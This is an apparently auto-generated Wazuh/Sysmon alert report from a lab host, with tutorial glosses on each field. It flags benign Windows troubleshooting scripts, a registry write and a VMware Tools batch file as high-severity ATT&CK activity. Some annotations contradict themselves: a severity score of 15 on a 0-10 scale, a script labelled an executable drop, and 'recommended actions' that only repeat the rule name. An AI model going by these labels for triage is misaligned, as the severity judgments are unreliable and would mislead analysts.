rule.description:  Scripting file created under Windows Temp or User folder
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92200
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059', 'T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution', 'Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Command and Scripting Interpreter', 'Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  8
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533981.553658
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-17T16:47:59.1906537Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  215909
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-17 16:47:59.181 ProcessGuid: {94294ddc-4855-6800-0605-000000000e00} ProcessId: 8224 Image: C:\WINDOWS\system32\taskhostw.exe TargetFilename: C:\Windows\Temp\SDIAG_793f0fe6-b720-46da-957f-85c14eacec92\TS_InaccurateSystemTime.ps1 CreationUtcTime: 2025-04-17 16:47:59.181 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-17 16:47:59.181
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-4855-6800-0605-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  8224
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\system32\\taskhostw.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Windows\\Temp\\SDIAG_793f0fe6-b720-46da-957f-85c14eacec92\\TS_InaccurateSystemTime.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-17 16:47:59.181
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Scripting file created under Windows Temp or User folder

🧠 What happened? Scripting file created under Windows Temp or User folder

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:33:01.267+0000 | 🧠 MITRE: ['Execution', 'Command and Control'] – ['Command and Scripting Interpreter', 'Ingress Tool Transfer'] [T1059] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:33:01.267+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  6
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Scripting file created under Windows Temp or User folder
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92200
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059', 'T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution', 'Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Command and Scripting Interpreter', 'Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  9
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533981.556345
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-17T16:47:59.2078912Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  215910
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-17 16:47:59.190 ProcessGuid: {94294ddc-4855-6800-0605-000000000e00} ProcessId: 8224 Image: C:\WINDOWS\system32\taskhostw.exe TargetFilename: C:\Windows\Temp\SDIAG_793f0fe6-b720-46da-957f-85c14eacec92\TS_WERQueue.ps1 CreationUtcTime: 2025-04-17 16:47:59.190 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-17 16:47:59.190
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-4855-6800-0605-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  8224
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\system32\\taskhostw.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Windows\\Temp\\SDIAG_793f0fe6-b720-46da-957f-85c14eacec92\\TS_WERQueue.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-17 16:47:59.190
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:33:01.860+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:33:01.860+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  2
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533981.558984
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-17T16:48:00.6014475Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  215966
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-17 16:48:00.599 ProcessGuid: {94294ddc-30bf-6801-4608-000000000e00} ProcessId: 6980 Image: C:\WINDOWS\System32\sdiagnhost.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_db30s5jz.dk2.ps1 CreationUtcTime: 2025-04-17 16:48:00.599 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-17 16:48:00.599
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-30bf-6801-4608-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  6980
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\sdiagnhost.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_db30s5jz.dk2.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-17 16:48:00.599
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  15
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

No description

🧠 What happened? No description

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:33:11.751+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:33:11.751+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  4
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.id:  11
Numeric ID of the detection rule that fired.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['stats']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533991.561646
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  The average number of logs between 22:00 and 23:00 is 2213. We reached 5534.
The complete raw log message before parsing – last‑resort truth for deep dives.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  13
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  13
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-17T16:52:26.7422645Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  216633
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Registry value set: RuleName: - EventType: SetValue UtcTime: 2025-04-17 16:52:26.740 ProcessGuid: {94294ddc-ea80-67fe-0d00-000000000e00} ProcessId: 908 Image: C:\WINDOWS\system32\svchost.exe TargetObject: HKLM\SOFTWARE\Microsoft\Windows\Windows Error Reporting\TermReason\8348\Reason Details: DWORD (0x00000004) User: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.eventType:  SetValue
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-17 16:52:26.740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-ea80-67fe-0d00-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  908
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\system32\\svchost.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetObject:  HKLM\\SOFTWARE\\Microsoft\\Windows\\Windows Error Reporting\\TermReason\\8348\\Reason
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.details:  DWORD (0x00000004)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  4
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

Windows command prompt started by an abnormal process

🧠 What happened? Windows command prompt started by an abnormal process

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:33:35.079+0000 | 🧠 MITRE: ['Execution'] – ['Windows Command Shell'] [T1059.003]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:33:35.079+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  4
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows command prompt started by an abnormal process
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92052
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.003']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Windows Command Shell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  2
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534015.563163
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:40:35.4122124Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  218350
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-20 01:40:34.927 ProcessGuid: {94294ddc-5092-6804-8308-000000000e00} ProcessId: 13156 Image: C:\Windows\System32\cmd.exe FileVersion: 10.0.26100.3624 (WinBuild.160101.0800) Description: Windows Command Processor Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: Cmd.Exe CommandLine: C:\WINDOWS\system32\cmd.exe /c ""C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"" CurrentDirectory: C:\WINDOWS\system32\ User: NT AUTHORITY\SYSTEM LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000} LogonId: 0x3E7 TerminalSessionId: 0 IntegrityLevel: System Hashes: SHA256=6EEF334D826BE3DC737BB30FBE84B69E529AAB956EC33D714B5A75276A58ED04 ParentProcessGuid: {94294ddc-ea88-67fe-4800-000000000e00} ParentProcessId: 3220 ParentImage: C:\Program Files\VMware\VMware Tools\vmtoolsd.exe ParentCommandLine: "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe" ParentUser: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-20 01:40:34.927
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-5092-6804-8308-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  13156
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\cmd.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3624 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows Command Processor
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  Cmd.Exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  C:\\WINDOWS\\system32\\cmd.exe /c \"\"C:\\Program Files\\VMware\\VMware Tools\\resume-vm-default.bat\"\"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\WINDOWS\\system32\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea7f-67fe-e703-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=6EEF334D826BE3DC737BB30FBE84B69E529AAB956EC33D714B5A75276A58ED04
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-ea88-67fe-4800-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  3220
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe\"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Suspicious Windows cmd shell execution

🧠 What happened? Suspicious Windows cmd shell execution

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:33:35.160+0000 | 🧠 MITRE: ['Discovery', 'Execution'] – ['Account Discovery', 'Windows Command Shell'] [T1087] [T1059.003]

🚨 Severity: High

🧪 Investigation Guidance

[Unknown] T1087 – Account Discovery

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:33:35.160+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Suspicious Windows cmd shell execution
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92032
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1087', 'T1059.003']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Discovery', 'Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Account Discovery', 'Windows Command Shell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  3
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534015.568786
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:40:35.6081940Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  218360
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
